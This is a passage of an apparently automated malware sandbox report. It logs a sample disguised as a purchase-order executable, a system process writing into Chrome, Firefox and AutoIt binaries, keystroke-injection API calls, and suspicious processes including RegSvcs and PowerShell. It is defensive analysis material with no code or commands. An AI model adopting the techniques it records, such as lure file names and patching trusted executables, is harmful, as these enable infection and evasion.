                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 166400Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739916Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739840Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 21924Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 185856Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00468111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00468111
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0041EB42
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0042123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042123A
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
